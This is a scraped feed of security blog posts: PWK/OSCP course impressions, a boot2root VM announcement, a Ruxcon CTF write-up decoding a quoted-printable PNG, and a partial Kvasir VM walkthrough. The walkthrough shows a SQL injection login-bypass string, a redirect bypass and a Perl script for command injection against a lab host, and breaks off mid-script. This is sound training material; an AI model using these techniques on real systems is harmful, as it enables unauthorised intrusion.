<h2>Labs</h2>

<p>First of all, you shouldn&rsquo;t really treat this as a typical certification, where you study a bit, pass the exam and forget most of the stuff you&rsquo;ve done in the next couple weeks.</p>

<p>It&rsquo;s a learning process where you&rsquo;ll be able to figure out a lot of things all by yourself, find methodology that works best, develop your own scripts/tools to assist you with your work in the long run (and not only during the labs/exam), build up your knowledge base on known vulnerabilities and exploits plus a whole lot more.</p>

<blockquote><p>&ldquo;It&rsquo;s all about the journey, not the destination&rdquo;</p></blockquote>

<p>You gonna spend a lot of time researching, failing and researching more during your time in the labs. It may be quite annoying at times, you may feel inadequate, angry, but then you&rsquo;ll figure it out, move on to the next machine and the process starts again. Sounds annoying, but in the long run, it&rsquo;s very rewarding!</p>

<p>What you also need to know that it&rsquo;s VERY time consuming. If you can&rsquo;t dedicate regular time to it (at least couple hours every day), you&rsquo;re not going to benefit from it and enjoy it.</p>

<p>All failed exploits, research and enumeration is also a learning process, but it does take time&hellip; a lot of time! There will be days where you will go with no machines compromised and a lot of failed attempts and then there will be days where you&rsquo;ll get 4 machines in a single day (that you probably wouldn&rsquo;t if you didn&rsquo;t fail earlier on!).</p>

<p>The labs will teach you numerous things, but most importantly, it&rsquo;ll put you in a right mindset to think like a hacker. As soon as you stop thinking like a good guy, you&rsquo;ll begin to succeed. It happened to me! I was trying to follow a process, be quite formal about it all and&hellip; I wasn&rsquo;t going too far very quickly. As soon as I started thinking like a bad guy and asking myself &ldquo;how can I benefit from it?&rdquo; about almost everything I came across, I started moving forward&hellip; quickly! It all starts with mentality.</p>

<p>Then, methodology - you&rsquo;ll figure out on your own what approach works best, how to track and document everything, how to keep notes, what steps to take with every machine, how to find yourself amongst a large number of machines and vulnerabilities.</p>

<p>And then there&rsquo;s technical part. Without spoiling, you&rsquo;ll learn a lot about Windows and Unix privilege escalation, web vulnerabilities, a bit on exploit development (basics), you&rsquo;ll come across bad and default configurations, weak passwords, silly users and more!</p>

<p>There&rsquo;s no real goal, it&rsquo;s all about learning and&hellip; personal achievements :) Some people want to break into every single machine, some want to get to the administrative domain, some want to get a &lsquo;big 3&rsquo; - machines called pain, sufference and humble. At the end of the day, it&rsquo;s all about learning! Do as much as you need to learn and feel comfortable tackling new and unknown challenges.</p>

<h2>Exam</h2>

<p>Exam is, well, intense. You&rsquo;ve got 5 machines and you&rsquo;ll need to break into at least 4 of them to pass.</p>

<p>The difficulty is not the machines themselves though, it&rsquo;s the time constraint! Given that you only have 24 hours, there&rsquo;s not much time to sleep. The machines are quite similar to those in the labs, but of course, not exactly the same. As long as you&rsquo;ve done majority of the machines in the labs, you should have seen enough to be able to relatively comfortably tackle the exam.</p>

<p>Again, it&rsquo;s all about the approach and methodology, I can&rsquo;t say when you&rsquo;re ready or not, you will find it out yourself as you&rsquo;ll be going through the labs.</p>

<h2>Tips</h2>

<p>I want to list couple things that I think helped me preparing to take the course and what I found useful over the course of the labs and exam:</p>

<ul>
<li><a href="https://vulnhub.com">vulnhub.com</a> - if you haven&rsquo;t checked that out yet, stop reading and go there NOW! Bunch of awesome VMs that were created to be hacked. Variety of different difficulties, vulnerabilities and great community to be a part of, I cannot recommend it enough!</li>
<li>attend some CTFs in your area or online, you&rsquo;ll meet bunch of awesome people and learn new things as you go</li>
<li>familiarise yourself with at least 1 or 2 scripting languages - probably Python and Unix shell scripting, creating your own tools, automating tasks and reading and understanding exploits will be a lot easier</li>
<li>Enumerate, enumerate, enumerate&hellip; oh, did I mention enumerating? Yeah, enumerate! That&rsquo;s really what pentesting/hacking is all about, you want to find out as much as you can about your target and as you&rsquo;re doing it, any potential vulnerabilities and security holes will eventually jump out to you. Exploitation is just a tiny part of it, finding the way in is what takes time, knowledge and experience</li>
<li>If needed, slow down or stop and try to UNDERSTAND why the things don&rsquo;t work or behave a certain way. Don&rsquo;t fire off bunch of different exploits onto services if you don&rsquo;t know what do they do, how do they work, what version they are etc. etc. Remember, it&rsquo;s all about the journey (learning), not the destination (just passing the exam)</li>
<li>If some tools don&rsquo;t work - try to figure out why, find new versions or alternative tools that are being continually developed. If needed, create your own! :)</li>
<li>Learn to keep good notes, document every step you&rsquo;ve taken, every exploit you used and take screenshots along the way, maybe even develop a cheatsheet of things that you frequently do (e.g. <code>hydra</code> or <code>wfuzz</code> common syntax, take note of useful Windows and Linux kernel exploits etc.)</li>
</ul>


<h2>Summary</h2>

<p>I loved every single moment of the PWK and would definitely recommend it to everyone!</p>

<p>Few things to keep in mind:</p>

<ul>
<li>you need to be able to dedicate quite significant amount of time to it if you want to be successful</li>
<li>you have to be genuinely interested and willing to learn new things</li>
<li>you cannot be affraid of failure - you will be failing multiple times throughout the course of labs</li>
<li>it will teach you many cool things, but will also teach you to learn - how to look for information and approach problems</li>
<li>get some quality sleep before exam - you won&rsquo;t get much of it during the 24h challenge</li>
<li>set yourself a goal and work towards it - wether it&rsquo;s get all machines in the labs or break into the &ldquo;big 3&rdquo;, whatever to keep you motivated. Of course aim to get as many machines as you can, every single one will teach you something new</li>
<li>enumerate, enumerate, enumerate</li>
<li>go through the provided notes and exercises before starting the lab - it will be helpful down the track</li>
<li>it is HEAPS of fun!</li>
</ul>


<p>If you have any questions, feel free to hit me up on Twitter <a href="https://twitter.com/TheKnapsy">@TheKnapsy</a> or IRC on one of the channels I usually hang out at - #vulnhub or #offsec on <a href="https://freenode.net/">Freenode</a>.</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Pegasus Has Arrived - My First Boot2root VM]]></title>
    <link href="http://blog.knapsy.com/blog/2014/12/16/pegasus-has-arrived-my-first-boot2root-vm/"/>
    <updated>2014-12-16T21:54:34+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/12/16/pegasus-has-arrived-my-first-boot2root-vm</id>
    <content type="html"><![CDATA[<p>It&rsquo;s here! My first boot2root VM, inspired by various CTFs I attended this year and couple cool things I learnt, is finally here! Go and grab it from <a href="https://www.vulnhub.com/entry/pegasus-1,109/">here (via VulnHub)</a>.</p>

<!-- more -->


<h2>Overview</h2>

<p>Without giving out too much, I tried to design it the way it will exercise your patience and force you to think outside the box. Sometimes the obvious is not the right solution and sometimes the fundamentals and creativity pay off.</p>

<p>Huge thanks to <a href="https://twitter.com/g0tmi1k">g0tmi1k</a> for hosting the VM and a massive shoutout to <a href="https://twitter.com/iMulitia">mulitia</a> for beta-testing it!</p>

<p>Why the name? No particular reason&hellip; seemes like some of the VMs at <a href="https://www.vulnhub.com/">VulnHub</a> got their names from mythology, so just jumped on the bandwagon :)</p>

<p>Feel free to hit me up with some feedback, I&rsquo;d love to hear from you!</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[PNG From Hell - Ruxcon CTF Challenge]]></title>
    <link href="http://blog.knapsy.com/blog/2014/11/17/png-from-hell-ruxcon-ctf-challenge/"/>
    <updated>2014-11-17T11:43:20+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/11/17/png-from-hell-ruxcon-ctf-challenge</id>
    <content type="html"><![CDATA[<p>Some time ago now I was lucky enough to take part in <a href="https://ruxcon.org.au/events/ctf/">Ruxcon CTF</a>, which was absolutely awesome - learnt bunch of new things and met heaps of cool people!</p>

<p>There was a wide variety of different challenges, but this particular one REALLY did my head in. I spent way too much time on it during the CTF and unfortunately didn&rsquo;t manage to break it. Then recently, I decided to take a look at it again and, with a lot less hassle than I thought, I nailed it!</p>

<p>Let me introduce you to my most hated PNG of all times&hellip;</p>

<!-- more -->


<h2>Introduction</h2>

<p>Alright, let&rsquo;s get started, the goal is to find the flag in the following <a href="http://blog.knapsy.com/images/posts/2014-11-17-png-from-hell-ruxcon-ctf-challenge/oubliette.pcap">packet capture</a>.</p>

<p>Before we get to it, I owe a huge shout-out to <a href="https://twitter.com/TheColonial">TheColonial</a> for directing me onto the right path when solving this one&hellip; simply, sometimes it&rsquo;s best to write your own tools!</p>

<h2>Diving into packet capture</h2>

<p>Looking at the packet capture, we can quickly see that it&rsquo;s an SMTP traffic. Let&rsquo;s have a closer look at the TCP stream (right click on any packet of interest -> Follow TCP Stream).</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-17-png-from-hell-ruxcon-ctf-challenge/tcp_stream.png" alt="TCP stream" /></p>

<p>Looks like the transmitted email message will be of the most interest to us - let&rsquo;s extract it:</p>

<ul>
<li>Select to show packets going one way only (to the server)</li>
<li>Save as <em>raw</em> data extract</li>
</ul>


<p><img src="http://blog.knapsy.com/images/posts/2014-11-17-png-from-hell-ruxcon-ctf-challenge/raw_email.png" alt="Raw email" /></p>

<h2>Raw email</h2>

<p>Ok, so we have extracted email from the packet capture. Looking at the email, we can see that there&rsquo;s not much of useful plaintext information in the email (subject is just some gibberish), but there&rsquo;s an attachment that we&rsquo;ll need to focus on.</p>

<p>Few things on the attachment looking at the MIME headers and the attachment itself:</p>

<ul>
<li>it&rsquo;s encoded as quoted-printable</li>
<li>it looks like a PNG file (looking at first few bytes of the attachment)</li>
</ul>


<p>Let&rsquo;s remove all email relevant lines from the file and leave only quoted-printable PNG, making it look like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data/ctf/ruxcon2014# cat email_raw
</span><span class='line'>=89PNG
</span><span class='line'>=1A
</span><span class='line'>IHDR=00=00=01@=00=00=00=1E=10=02=00=00=00=82=91=8C=8D=00=00=18zID=
</span><span class='line'>ATx=DA=ED=9Dy\L=EB=1B=C0=9F=D9g=9A=D6I=A5$EIRYn=A5,=85=BA=EAR=B2=C4=CF=BD=
</span><span class='line'>
</span><span class='line'>... truncated ...
</span><span class='line'>
</span><span class='line'>=F8O=87=A0u=FB=18.=12M@k=E7=D0.R=AB=88~=1B=05=FA=EB=EE=1Dw.=D53I=B2,=11\l=
</span><span class='line'>=E9:=12=FC=13=C2k=04=04=04m=03b=11=16=01=01=01=01=01A=0B=F0=9F~=03&=20=20=
</span><span class='line'>=20=20=20h)=FE=0F=EF=91=EEe=FB=80=FE=9E=00=00=00=00IEND=AEB`=82</span></code></pre></td></tr></table></div></figure>


<p>Cool, so we have a quoted-printable PNG file. There&rsquo;s a problem though - there are carriage returns added before every meaningful new line (part of quoted-printable encoding)! They&rsquo;re easily visible when you open it up, for example, in <code>vim</code>.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-17-png-from-hell-ruxcon-ctf-challenge/vim.png" alt="Vim" /></p>

<p>Right&hellip; let&rsquo;s keep that in mind, it&rsquo;s something we&rsquo;ll need to get rid of.</p>

<h2>Plan of attack</h2>

<p>There are couple things we already know about the attachment, so we can have some sort of a plan of attack. Seems that we&rsquo;ll need to do the following:</p>

<ul>
<li>decode quoted-printable file</li>
<li>get rid of CRs before new lines</li>
<li>ensure we haven&rsquo;t corrupted PNG file header</li>
</ul>


<p>Seems pretty straight forward!</p>

<p>And that&rsquo;s exactly what I was also trying to do during the CTF, however, I was using pre-made tools for everything! I found some website that was accepting quoted printable files and spitting out decoded version, then I was using <code>vim</code> with <code>xxd</code> to get rid of CRs and manually playing with PNG file header.</p>

<p>It was all resulting in a corrupted PNG throwing all kinds of different errors. After lots of research, frustration and talking to <a href="http://buffered.io">OJ</a>, I have decided to write my own tool to do it all for me.</p>

<h2>Quoted-Printable</h2>

<p>Before we start, few words on <a href="http://en.wikipedia.org/wiki/Quoted-printable">Quoted-Printable</a> encoding. There are couple of rules that we&rsquo;ll need to keep in mind:</p>

<ul>
<li>any 8 bit value may be encoded with 3 characters: <code>=</code>, followed by two hex digits representing the byte&rsquo;s numberic value</li>
<li>all printable ASCII characters are represented as themselves (no <code>=</code> required)</li>
<li>all lines cannot be longer than 76 characters, soft line breaks may be added (<code>=</code> at the end of the line) to allow encoding very long lines without line breaks</li>
</ul>


<h2>PNG header</h2>

<p>Also, it&rsquo;s important to understand how <a href="http://www.libpng.org/pub/png/spec/1.2/PNG-Rationale.html#R.PNG-file-signature">PNG header</a> looks like and why.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>   (hexadecimal)           89  50  4e  47  0d  0a  1a  0a
</span><span class='line'>   (ASCII C notation)    \211   P   N   G  \r  \n \032 \n</span></code></pre></td></tr></table></div></figure>


<ul>
<li>First two bytes distinguish PNG files on systems that expect the first two bytes to identify the file type. It also catches bad file transfers that clear bit 7.</li>
<li>The next 3 bytes represent name of the format</li>
<li>The CR-LF sequence (<code>0d 0a</code>) catches bad file transfers that alter new line sequences</li>
<li><code>1a</code> stops file display under MS-DOS</li>
<li>The final LF checks for the inverse of the CR-LF translation problem</li>
</ul>


<h2>Writing own decoder</h2>

<p>Okay, so now we have a good understanding of the theory behind it all, so let&rsquo;s code something up!</p>

<p>Again, recapping, what we&rsquo;ll need to do is:</p>

<ul>
<li>decode quoted printable, following basic rules listed above and ensuring to handle soft line breaks properly (i.e. omit decoding of them)</li>
<li>get rid of CRs from CR-LF sequences, <em>except</em> the one from the PNG header</li>
</ul>


<p>The following Python code does it all.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
</pre></td><td class='code'><pre><code class='Python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="n">raw_file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&quot;email_raw&quot;</span><span class="p">,</span> <span class="s">&quot;rb&quot;</span><span class="p">)</span>
</span><span class='line'><span class="n">output_png</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">&quot;output.png&quot;</span><span class="p">,</span> <span class="s">&quot;w&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Read in all lines and save in one long stream of chars</span>
</span><span class='line'><span class="n">content</span> <span class="o">=</span> <span class="s">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">raw_file</span><span class="o">.</span><span class="n">readlines</span><span class="p">())</span>
</span><span class='line'>
</span><span class='line'><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
</span><span class='line'><span class="k">while</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="nb">len</span><span class="p">(</span><span class="n">content</span><span class="p">):</span>
</span><span class='line'>    <span class="c"># Part of quoted printable, 2 characters following &#39;=&#39; are a hex</span>
</span><span class='line'>    <span class="c"># representation of a symbol. Decode it and write to the output file.</span>
</span><span class='line'>    <span class="k">if</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="s">&quot;=&quot;</span><span class="p">:</span>
</span><span class='line'>        <span class="c"># If they&#39;re not /r/n (soft line break of quoted printable),</span>
</span><span class='line'>        <span class="c"># write them in, otherwise ignore</span>
</span><span class='line'>        <span class="k">if</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s">&#39;</span><span class="se">\r</span><span class="s">&#39;</span> <span class="ow">and</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s">&#39;</span><span class="se">\n</span><span class="s">&#39;</span><span class="p">:</span>
</span><span class='line'>            <span class="n">output_png</span><span class="o">.</span><span class="n">write</span><span class="p">((</span><span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">])</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">))</span>
</span><span class='line'>        <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">2</span>   <span class="c"># increment counter by 2 (read 2 characters already)</span>
</span><span class='line'>    <span class="k">else</span><span class="p">:</span>
</span><span class='line'>        <span class="c"># Also part of quoted printable, characters that can be</span>
</span><span class='line'>        <span class="c"># represented in ASCII are kept as themselves.</span>
</span><span class='line'>        <span class="c">#</span>
</span><span class='line'>        <span class="c"># if the character is &#39;\r&#39; followed by &#39;\n&#39; - ignore,  write</span>
</span><span class='line'>        <span class="c"># &#39;\n&#39; only, unless it&#39;s a part of the PNG header (7th byte)</span>
</span><span class='line'>        <span class="k">if</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="s">&#39;</span><span class="se">\r</span><span class="s">&#39;</span> <span class="ow">and</span> <span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">&#39;</span><span class="se">\n</span><span class="s">&#39;</span> <span class="ow">and</span> <span class="n">i</span> <span class="o">!=</span> <span class="mi">6</span><span class="p">:</span>
</span><span class='line'>            <span class="n">output_png</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">])</span>
</span><span class='line'>            <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span>   <span class="c"># increment counter by 1 (wrote \n)</span>
</span><span class='line'>        <span class="k">else</span><span class="p">:</span>
</span><span class='line'>            <span class="n">output_png</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
</span><span class='line'>    <span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span>   <span class="c"># increment counter by 1 (moving on to the next character)</span>
</span><span class='line'>
</span><span class='line'><span class="n">raw_file</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'><span class="n">output_png</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></code></pre></td></tr></table></div></figure>


<p>Run it on the previously extracted raw email file.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data/ctf/ruxcon2014# python decode.py</span></code></pre></td></tr></table></div></figure>


<p>And open up <code>output.png</code> file.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-17-png-from-hell-ruxcon-ctf-challenge/output.png" alt="Output PNG" /></p>

<p>That&rsquo;s it!</p>

<h2>Summary</h2>

<p>It was actually a lot easier than I thought&hellip; once you know the theory behind it all, understand what&rsquo;s the actual problem we&rsquo;re facing here (CR-LF conversion issue) and write your own tool to do it (not sure why all of the tools I tried didn&rsquo;t do it properly), it&rsquo;s actually not that hard&hellip; and only handful of people managed to complete it at the CTF!</p>

<p>Looking back at it, it was pretty frustrating, but I didn&rsquo;t take time to properly read through all the basics during the CTF and I was trying to quickly hack some ad-hoc solution, which didn&rsquo;t work well at all. I guess the time pressure and the thought that <em>&ldquo;there are so many other challenges to hack to get points&rdquo;</em> sometimes takes over calm, logical thinking. Next time I&rsquo;ll try to take a step back and really ask myself <em>&ldquo;what are we trying to solve here&rdquo;</em>.</p>

<p>I&rsquo;m so glad I managed to finish it, it was really doing my head in and, in the end, I learnt a lot from it!</p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Kvasir VM Writeup]]></title>
    <link href="http://blog.knapsy.com/blog/2014/11/05/kvasir-vm-writeup/"/>
    <updated>2014-11-05T19:30:38+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/11/05/kvasir-vm-writeup</id>
    <content type="html"><![CDATA[<p>It sort of became the main theme of this blog&hellip; yet another writeup for a VM from <a href="http://vulnhub.com">VulnHub</a> and, I have to admit, probably the most demanding one yet!</p>

<p><a href="http://vulnhub.com/entry/kvasir-i,106/">Kvasir</a> touches on quite a lot of aspects of security/pentesting and really tests your patience. <a href="https://twitter.com/_RastaMouse">Rasta Mouse</a> did a great job putting it all together and simulating a network of quite some depth by using Linux containers.</p>

<p>So, without delying too much, let&rsquo;s get right into it as there&rsquo;s A LOT to go through!</p>

<!-- more -->


<h2>Preface</h2>

<p>Since it&rsquo;s quite lengthy VM, I&rsquo;ll skip describing thousands of failed attempts and other ideas that I had and thought <em>should have</em> worked.</p>

<p>Instead, I will jump straight to the essence, but, in some cases, I&rsquo;ll mention what is also worth trying if you find yourself in similar situations (but didn&rsquo;t work with this challenge).</p>

<h2>Recon</h2>

<p>You know the drill, boot up the VM, wait a little bit for containers to kick-in and use <code>netdiscover</code> to find its IP address.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# netdiscover -r 172.16.246.0/24
</span><span class='line'>
</span><span class='line'> Currently scanning: Finished!   |   Screen View: Unique Hosts                 
</span><span class='line'>                                                                               
</span><span class='line'> 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
</span><span class='line'> _____________________________________________________________________________
</span><span class='line'>   IP            At MAC Address      Count  Len   MAC Vendor                   
</span><span class='line'> ----------------------------------------------------------------------------- 
</span><span class='line'> 172.16.246.1    00:50:56:c0:00:01    01    060   VMWare, Inc.                 
</span><span class='line'> 172.16.246.134  00:0c:29:a8:5e:9e    01    060   VMware, Inc.                 
</span><span class='line'> 172.16.246.254  00:50:56:f1:3e:b4    01    060   VMWare, Inc.                 </span></code></pre></td></tr></table></div></figure>


<p>And <code>nmap</code> to find what ports are open.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV 172.16.246.134
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-11-05 19:42 EST
</span><span class='line'>Nmap scan report for 172.16.246.134
</span><span class='line'>Host is up (0.00032s latency).
</span><span class='line'>Not shown: 999 closed ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>80/tcp open  http    Apache httpd 2.2.22 ((Debian))
</span><span class='line'>MAC Address: 00:0C:29:A8:5E:9E (VMware)
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 19.24 seconds</span></code></pre></td></tr></table></div></figure>


<h2>No redirect and command injection</h2>

<p>Let&rsquo;s have a look at that webserver.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/login.png" title="Login" alt="Login" /></p>

<p>We have a simple login form, first thing I usually try is bypassing this with some standard SQL injection <code>' or '1'='1' --</code> in both login and password fields. Unfortunately this didn&rsquo;t work here.</p>

<p>Let&rsquo;s create a new user and see what else can we access.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/welcome.png" title="Welcome" alt="Welcome" /></p>

<p>Hmm, not much of a useful stuff. Generally, you would want to keep an eye on and play with:</p>

<ul>
<li>cookies</li>
<li>XXS - not very useful here as there are no users to attack</li>
<li>SQL injection on any of the input fields / URL parameters</li>
</ul>


<p>But none of the above worked. So let&rsquo;s open up <code>dirbuster</code> and see are there any other pages that we can&rsquo;t access at the moment&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# dirbuster
</span><span class='line'>Starting OWASP DirBuster 1.0-RC1
</span><span class='line'>Starting dir/file list based brute forcing
</span><span class='line'>File found: /index.php - 200
</span><span class='line'>Dir found: / - 200
</span><span class='line'>Dir found: /cgi-bin/ - 403
</span><span class='line'>File found: /login.php - 302
</span><span class='line'>File found: /register.php - 200
</span><span class='line'>File found: /submit.php - 200
</span><span class='line'>File found: /admin.php - 302
</span><span class='line'>File found: /member.php - 302
</span><span class='line'>...</span></code></pre></td></tr></table></div></figure>


<p>Straight away <code>admin.php</code> stands out - looks interesting&hellip; and when trying to access it, we get a redirect to member.php! Cool, let&rsquo;s use <code>burp</code> and avoid redirection.</p>

<p>I&rsquo;m using <code>FoxyProxy</code> to ensure my browser is using proxy I specify (in this case, <code>burp</code>). Set it up and type in <code>http://172.16.246.134/admin.php</code> in the address bar.</p>

<p>Go to Proxy -> Intercept and Burp and set it to intercept response.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/intercept_response.png" title="Intercept Response" alt="Intercept Response" /></p>

<p>Forward the request and you&rsquo;ll see the response.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/response.png" title="Response" alt="Response" /></p>

<p>Let&rsquo;s modify the header from <code>HTTP/1.1 302 FOUND</code> to <code>HTTP/1.1 200</code> (bypassing redirection) and forward the packet. Look what we can see in the browser now!</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/service_check.png" title="Service Check" alt="Service Check" /></p>

<p>Awesome! Let&rsquo;s type in what&rsquo;s suggested - apache2 and see what happens. Since we still have <code>burp</code> running, we&rsquo;ll go through the same steps of modifying the request and response as above, otherwise, we&rsquo;ll be redirected back to <code>member.php</code> page.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/apache_running.png" title="Apache Running" alt="Apache Running" /></p>

<p>It&rsquo;s just asking for command injection! But since doing it all through <code>burp</code> would be a bit of a pain, I&rsquo;ve crafted a simple script to do it all for me.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class='perl'><span class='line'><span class="c1">#!/usr/bin/perl</span>
</span><span class='line'>
</span><span class='line'><span class="nv">$url</span><span class="o">=</span><span class="s">&#39;http://172.16.246.134/admin.php&#39;</span><span class="p">;</span>
</span><span class='line'>
</span><span class='line'><span class="k">use</span> <span class="n">LWP</span><span class="p">;</span>
</span><span class='line'><span class="k">use</span> <span class="nn">HTTP::Request::</span><span class="n">Common</span><span class="p">;</span>
</span><span class='line'><span class="nv">$ua</span> <span class="o">=</span> <span class="nv">$ua</span> <span class="o">=</span> <span class="nn">LWP::</span><span class="n">UserAgent</span><span class="o">-&gt;</span><span class="k">new</span><span class="p">;;</span>
</span><span class='line'><span class="nv">$res</span> <span class="o">=</span> <span class="nv">$ua</span><span class="o">-&gt;</span><span class="n">request</span><span class="p">(</span><span class="n">POST</span> <span class="nv">$url</span><span class="p">,</span>
</span><span class='line'><span class="n">Content_Type</span> <span class="o">=&gt;</span> <span class="s">&#39;form-data&#39;</span><span class="p">,</span>
</span><span class='line'>
</span><span class='line'><span class="n">Content</span> <span class="o">=&gt;</span> <span class="p">[</span>
</span><span class='line'><span class="n">service</span> <span class="o">=&gt;</span> <span class="nv">$ARGV</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span>
</span><span class='line'><span class="n">submit</span> <span class="o">=&gt;</span> <span class="s">&quot;Submit&quot;</span><span class="p">,</span>
</span><span class='line'><span class="p">],);</span>
</span><span class='line'>
</span><span class='line'><span class="c1"># Print response</span>
